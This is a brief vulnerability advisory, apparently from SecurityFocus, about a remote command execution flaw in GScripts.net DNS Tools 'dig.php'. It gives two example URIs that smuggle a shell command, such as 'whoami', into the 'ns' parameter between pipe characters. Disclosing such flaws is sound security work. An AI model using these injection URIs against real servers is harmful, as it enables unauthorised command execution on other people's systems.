GScripts.net DNS Tools 'dig.php' Remote Command Execution Vulnerability

An attacker can exploit this issue using a browser.

The following example URIs are available:

http://www.example.com/dig.php?ns=||COMMAND HERE||&host=example.com&query_type=NS&status=digging
http://www.example.com/dig.php?ns=||whoami||&host=example.com&query_type=NS&status=digging


 

Privacy Statement
Copyright 2010, SecurityFocus